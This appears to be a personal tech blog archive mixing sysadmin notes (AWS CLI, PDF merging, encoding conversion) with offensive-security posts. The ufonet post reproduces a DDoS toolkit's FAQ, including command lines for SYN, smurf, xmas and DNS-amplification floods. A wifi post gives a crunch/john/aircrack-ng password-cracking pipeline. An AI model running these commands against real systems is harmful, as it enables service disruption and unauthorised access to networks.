Wednesday, January 29, 2020

Open Data Exchange Layer (OpenDXL)

 The goal of the Open Data Exchange Layer (OpenDXL) is to enable security devices to share intelligence and orchestrate security operations in real time.

What is OpenDXL?

OpenDXL lets developers join an adaptive system of interconnected services that communicate and share information to make real-time, accurate security decisions. OpenDXL leverages the Data Exchange Layer (DXL), which many vendors and enterprises already utilize, and delivers a simple, open path for integrating security technologies regardless of vendor.

Designed to improve the context of analysis, shorten workflows of the threat defense lifecycle, reduce complexities across security products and vendors, and increase the value of previously deployed applications, OpenDXL enables unprecedented collaboration in an open, real-time system. By attaching to a common application framework, each participant enters into a unified ecosystem, one that gains value and capability as the network effect activates.

Structured Threat Information Expression (STIX)

It is becoming increasingly necessary for organizations to have a cyber threat intelligence capability and a key component of success for any such capability is information sharing with partners, peers and others they select to trust. While cyber threat intelligence and information sharing can help focus and prioritize the use of the immense volumes of complex cyber security information organizations face today, they have a foundational need for standardized, structured representations of this information to make it tractable. The Structured Threat Information eXpression (STIX™) is a quickly evolving, collaborative community-driven effort to define and develop a language to represent structured threat information. The STIX language is meant to convey the full range of cyber threat information and strives to be fully expressive, flexible, extensible, automatable, and as human-readable as possible. Though relatively new and still evolving, it is actively being adopted or considered for adoption by a wide range of cyber threat-related organizations and communities around the world. All interested parties are welcome to participate in evolving STIX as part of its open, collaborative community via the STIX web site, email discussion lists and other collaborative forums.

Structured Threat Information Expression (STIX™) is a structured language for describing cyber threat information so it can be shared, stored, and analyzed in a consistent manner.

The STIX whitepaper describes the motivation and architecture behind STIX. At a high level the STIX language consists of 9 key constructs and the relationships between them:
  • Observables describe what has been or might be seen in cyber
  • Indicators describe patterns for what might be seen and what they mean if they are
  • Incidents describe instances of specific adversary actions
  • Adversary Tactics, Techniques, and Procedures describe attack patterns, malware, exploits, kill chains, tools, infrastructure, victim targeting, and other methods used by the adversary
  • Exploit Targets describe vulnerabilities, weaknesses, or configurations that might be exploited
  • Courses of Action describe response actions that may be taken in response to an attack or as a preventative measure
  • Campaigns describe sets of incidents and/or TTPs with a shared intent
  • Threat Actors describe identification and/or characterization of the adversary
  • Reports collect related STIX content and give them shared context

How do I get it?

The current release is STIX Version 2.0, which is available on the STIX 2.0 website.
An archive of previous releases is hosted on this website.
Bindings and related tools to help process and work with STIX are open source on Github.

Where can I find examples of STIX data? Are there any STIX repositories?

The Samples page on this website hosts full threat reports expressed via STIX, including Mandiant’s APT1 report and FireEye’s Poison Ivy report. Idioms also provide good constrained examples.
In addition to the MITRE samples, community members have set up TAXII repositories containing STIX content and even directories pointing to those repositories. One example repository is

How do I use STIX? What tools/utilities are available for this effort?

The primary way to use STIX is of course via commercial products. See “Who is using STIX?” for more information.
If you’re developing a product or tool, the current STIX reference implementation is in XML so any XML libraries are suitable for producing and consuming STIX XML. The project also maintains open-source Python bindings and other Utilities to make working with STIX at the code level easier. Documentation and Suggested Practices, as well as Examples, can help you understand how to use the STIX Language conceptually (beyond just producing the XML).

Who is using STIX?

The OASIS Cyber Threat Intelligence (CTI) Technical Committee (TC) hosts “STIX/CybOX/TAXII Supporters” lists for both products and open source projects. You can add your product/project via their registration form.
In additon, the STIX Blog also notes vendor press releases and announcements.


TAXII (Trusted Automated eXchange of Indicator Information) is the main transport mechanism for cyber threat information represented in STIX. Through the use of TAXII services, organizations can share cyber threat information in a secure and automated manner.
The STIX and TAXII communities work closely together (and in fact consist of many of the same people) to ensure that they continue to provide a full stack for sharing threat intelligence.

Monday, December 9, 2019

Sunday, October 20, 2019

ufonet: a toolkit for ddos simulations


ddos test aracı

What is UFONet?

It is a toolkit designed to launch DDoS and DoS attacks.

What is a DDoS attack?

A Distributed Denial of Service (DDoS) attack is an attempt to make an online service
unavailable by overwhelming it (for example, with traffic...) from multiple sources.

What is a DoS attack?

A Denial of Service (DoS) attack is an attempt to make an online service
unavailable by overwhelming it (for example, with traffic...) from a single source.

What is a Botnet?

A Botnet is a collection of computers often referred to as "zombies" that allows an attacker
to control them. It is commonly used to make DDoS attacks.

What is the philosophy behind UFONet?

"On a samurai sword or even any tool, what matters is who goes to use it and for what,
not who builds it and when..."

Why can UFONet be more special, than for example, other botnets previously built?

Because UFONet tries not living traces (IPs, etc...) from the origin of the attack. And
of course, because it is free/libre. ;-)

How does UFONet work technically?

UFONet is a tool designed to launch Layer 7 (HTTP/Web Abuse) DDoS attacks, using 'Open Redirect'
vectors, generally located on third part-y web applications (a botnet) and other
powerful DoS attacks, some including different OSI model layers, as for example
the TCP/SYN flood attack, which is perform on Layer 3 (Network).

This schema shows you how the architecture of the requests are made when performing
a simple DDoS attack.

Is UFONet a "strong" botnet?

Well!. It depends on how you understand a botnet as "strong". If you understand it as;

 *  'privacy'; UFONet is the best -ninja- DDoS/DoS tool...
 *  'traffic volume'; it depends on; 'zombies', bandwidth, target's conf, etc...

With UFONet it's not about having a lot of 'zombies', it's more about those you have
work properly. If they are nice, you can 'defeat' a 'small' webserver just with
a 'couple of dozens'.

Or for example, in a scenario in which a target is using a VPS service with some limited
bandwidth rate (ex: 1GB/month) for the attacker is just a matter of time to run the tool
and wait until traffic (noise) reaches the maximum limit that closes the service.

Commonly people understand a botnet as an individual tool but UFONet is also a P2P/darknet,
that can be used to connect others machines and to run complex schemas involving other people
working cooperatively: sharing 'zombies', reporting statistics (with rankings, clans)...

Therefore, UFONet can also be defined fundamentally, as: a botnet of botnets, which is
obviously a harder and effective way to overwhelm an objective, than when a single person
tries it individually.

What's the difference between: 'zombies', 'aliens', 'droids', 'ucavs'...?

 * Zombie: HTTP GET 'Open Redirect' bot


 * Droid: HTTP GET 'Open Redirect' bot with params

 ex: https://ZOMBIE.COM/css-validator/validator?uri=$TARGET&profile=css3

 * Alien: HTTP POST 'Open Redirect' bot


 * Drone: HTTP 'Web Abuse' bot


 * X-RPC: XML-RPC Vulnerability

 ex: https://ZOMBIE.COM/xmlrpc.php

Is it possible to stress target's database using UFONet?

Yes, it is. For example, you can order to your 'zombies' to submit random valid requests
on a target's search input form. This floods database with queries.

 ex(wordpress): ./ufonet -a '' --db '?s='

Is there a LOIC connected to UFONet?

Yes, hehe... It has implemented an advanced version of that software that supports proxies.

 ex: ./ufonet -a '' --loic 500

And a LORIS?

Yes, of course. You can connect one to make requests leave open threads on the target too,
making the web server work slower:

 ex: ./ufonet -a '' --loris 100

How works UFOSYN?

It is a script to launch a powerful TCP-SYN (DoS) flood attack (it requires 'root' access):

 ex: sudo ./ufonet -a '' --ufosyn 100


This script is used to launch a TCP-SYN reflector (DDoS) flood attack (it requires 'root' access):

 ex: sudo ./ufonet -a '' --spray 100

What is a SMURF?

This other script is used to launch an ICMP echo (DDoS) flood attack (it requires 'root' access):

 ex: sudo ./ufonet -a '' --smurf 100


With this script you can launch a complex TCP-XMAS (DoS) flood attack (it requires 'root' access):

 ex: sudo ./ufonet -a '' --xmas 100

How works a NUKE?

With this script you can launch a TCP-STARVARTION (DoS) socking attack (it requires 'root' access)
that will knock down your target in seconds, if it does not have a minimum level of protection:

 ex: sudo ./ufonet -a '' --nuke 10000


With this script you can perform a distributed amplification of DNS traffic:

 ex: sudo ./ufonet -a '' --tachyon 1000

How should a powerful attack that combines all the techniques (DDoS+DoS)?

 sudo ./ufonet -a '' --loic 100 --loris 100 --ufosyn 100 /
      --spray 100 --smurf 100 --xmas 100 --nuke 10000 --tachyon 1000

How can I start with UFONet; for example using GNU/Linux (ex: Kali)?

You can try to install automatically all required libs by using this command (as root):

 % sudo python install

aws ec2 on linux command line


-An Amazon AWS account.(Free or Paid account)
-An IAM user with Access Key and secret access key.
–Pre-configured VPC, Subnets, Routes, Internet gateways, Security policy.
-Any Linux Machine with aws cli utlity installed.

aws cli installation:


– Linux.
– Python 2.6.5 or higher.

[Tested on Linux Mint with bash shell. should work on Ubuntu as well.]

Update your system and its packages:

sudo apt update && sudo apt upgrade -y

Install Pip:

sudo apt install python-pip -y
sudo pip install --upgrade pip

Install the following modules:

sudo pip install setuptools
sudo pip install wheel

Install AWS CLI:

sudo pip install awscli

To verify that the installation went well, you can run the following command.

aws --version

If the output shows the aws version, then you are all set.

Enable AWS commands Auto completion:

-To enable auto completion of sub commands, run the following to check where your “aws” and “aws_completer” are located.

which aws
which aws_completer

-Copy the output of “which aws_completer”. This would the path.

Most used aws ec2 commands for shell scripts:

aws ec2 describe-instances

aws ec2 start-instances --instance-ids i-dddddd70

aws ec2 stop-instances --instance-ids i-5c8282ed

aws ec2 terminate-instances --dry-run --instance-ids i-dddddd70

aws ec2 create-tags --resources i-dddddd70 --tags Key=Department,Value=Finance

aws ec2 describe-volumes

aws ec2 attach-volume  --volume-id vol-1d5cc8cc --instance-id i-dddddd70 --device /dev/sdh

aws ec2 run-instances --dry-run --image-id ami-08111162 --count 1 --instance-type t1.micro --key-name MyKeyPair --security-groups my-ami-security-group

aws ec2 reboot-instances --instance-ids i-dddddd70

aws ec2 modify-instance-attribute --instance-id i-44a44ac3 --instance-type "{\"Value\": \"m1.small\"}"

aws ec2 create-image --instance-id i-44a44ac3 --name "Dev AMI" --description "AMI for development server"

aws ec2 describe-images --image-ids ami-2d574747

aws ec2 deregister-image --image-id ami-2d574747 && aws ec2 delete-snapshot --snapshot-id snap-4e665454

aws ec2 delete-snapshot --snapshot-id snap-4e665454

aws ec2 modify-instance-attribute --instance-id i-44a44ac3 --disable-api-termination

aws ec2 modify-instance-attribute --instance-id i-44a44ac3 --no-disable-api-termination

aws ec2 get-console-output --instance-id i-44a44ac3

aws ec2 monitor-instances --instance-ids i-44a44ac3

aws ec2 unmonitor-instances --instance-ids i-44a44ac3

aws ec2 describe-key-pairs

aws ec2 create-key-pair --key-name dev-servers

aws ec2 delete-key-pair --key-name dev-servers

Tuesday, July 30, 2019

Merge multipe pdf files in single pdf file

pdfunite - Portable Document Format (PDF) page merger

$ pdfunite 1.pdf 2.pdf 3.pdf 4.pdf 5.pdf 6.pdf 7.pdf application.pdf

Monday, July 15, 2019


If you’re interested in learning how image search engines, or trying to build one of your own, you should check it out

pyenv installation


$ curl | bash redirects to the install script in this repository and the invocation above is equivalent to:

$ curl -L | bash


Monday, July 8, 2019

Cracking wifi passwords with wordlists

Use crunch to create a wordlist "on-the-fly" (without wasting storage) - pipe that to john with --session option (you can resume the cracking process) and give that to aircrack (-w - // without password list since crunch is creating it)

crunch 8 8 | john --stdin --session=superwifi --stdout | aircrack-ng -b 00:11:22:33:44:55 -w - handshake-Superwifi.cap


About John the ripper session parameter usage:

You do not have to leave John running on a (pseudo-)terminal. If running John on a Unix-like system, you can simply disconnect from the server, close your xterm, etc. John will catch the SIGHUP ("hangup" signal) and continue running. Alternatively, you may prefer to start it in the background right away:
 john --wordlist=all.lst --rules mypasswd &
Obviously, the "&" is specific to Unix shells and will not work on most other platforms.
You may further enhance this by specifying a session name:
 john --session=allrules --wordlist=all.lst --rules mypasswd &
This ensures that you won't accidentally interfere with the instance of John running in the background if you proceed to start other sessions.
To view the status of a running session, use:
 john --status
for the default session or:
 john --status=allrules

Wednesday, June 5, 2019

Tuesday, June 4, 2019

Convert file encoding: Turkish character saving problem

Turkish character saving problem

$ file -i input.file
$ cat input.file 
$ iconv -f ISO-8859-1 -t UTF-8//TRANSLIT input.file -o out.file
$ cat out.file 
$ file -i out.file 

Wednesday, April 3, 2019

Utility Functions for Resilient ( installation problem

Resilient Functions simplify development of integrations by wrapping each external activity into an individual workflow component. These components can be easily installed, then used and combined in Resilient workflows. The Resilient platform sends data to the function component that performs an activity then returns the results to the workflow. The results can be acted upon by scripts, rules, and workflow decision points to dynamically orchestrate the security incident response activities.

The Utility Functions integration package contains several useful workflow functions for common automation and integration activities in Resilient. These include:

    Function to call generic REST/JSON web service APIs,
    Function to run arbitrary shell scripts (bash and PowerShell),
    Functions to fetch SSL certificates from a server and parse them,
    Functions to work with Excel, HTML, XML, JSON and EML files,
    Functions to work with Resilient attachments: calculate hashes, list and extract ZIP archives, convert to and from base64
    And more.


[root@resilient ~]# pip install
Processing ./
    Complete output from command python egg_info:
    Traceback (most recent call last):
      File "<string>", line 1, in <module>
    IOError: [Errno 2] No such file or directory: '/tmp/pip-req-build-k_Apec/'
Command "python egg_info" failed with error code 1 in /tmp/pip-req-build-k_Apec/


[root@resilient ~]# unzip
  inflating: fn_utilities-1.0.6.tar.gz 

[root@resilient ~]# pip install fn_utilities-1.0.6.tar.gz

Wednesday, November 7, 2018

Antivirus Evasion Tools

Thursday, November 1, 2018

ollydbg quickstart guide

phrack: History and Advances in Windows Shellcode


Firewall is everywhere in the Internet now. Most of the exploits released in the public have little concern over firewall rules because they are just proof of concept. In real world, we would encounter targets with firewall that will make exploitation harder. We need to overcome these obstacles for a successful penetration testing job. The research of this paper started when we need to take over (own) a machine which is heavily protected with rigid firewall rules. Although we can reach the vulnerable service but the strong firewall rules between us and the server hinder all standard exploits useless. 

The objective of the research is to find alternative ways which allow penetration tester to take control of a machine after a successful buffer overflow. A successful buffer overflow in a sense that it will eventually leads to arbitrary code execution. These alternative mechanisms should succeed where others fail even in the most rigid firewall rules. 

In our research to find a way to by pass these troublesome firewall rules, we looked into various existing techniques used by exploits in the public and why they fail. Then, we found several mechanisms that will work, but dependence to the vulnerable service. Although we can take over the server using these techniques, we take one step further to develop a more generic technique which is not dependence to any service and can be reuse in most other buffer overflows. 

This paper will start with dissection on a standard Win32 shellcode as an introduction. We will then explore the techniques being used by proof of concept codes to allow attacker to control the target and their limitations. Then, we will introduce a few alternatives techniques which we call "One-way shellcode" and how they may by pass firewall rules. Finally, we also discussed on a possible way to transfer file from command line without breaking the firewall rule.

SEH - Structured Exception Handler EXPLOITATION



References: (Watch it)

Wednesday, October 24, 2018

Libssh Authentication Bypass Vulnerability Exploit (CVE-2018-10933)


Docker image:

Pico CTF 2018 Web Exploitation Writeup

running kali docker image on linode

$ docker pull kalilinux/kali-linux-docker
$ docker run -t -i kalilinux/kali-linux-docker /bin/bash
# apt-get update && apt-get install metasploit-framework

Saturday, October 20, 2018

Wednesday, October 17, 2018


Control DNS responses
ApateDNS™ is a tool for controlling DNS responses though an easy-to-use GUI. As a phony DNS server, ApateDNS spoofs DNS responses to a user-specified IP address by listening on UDP port 53 on the local machine. ApateDNS also automatically sets the local DNS to localhost. Upon exiting the tool, it sets back the original local DNS settings.


Regshot is an open-source (LGPL) registry compare utility that allows you to quickly take a snapshot of your registry and then compare it with a second one - done after doing system changes or installing a new software product.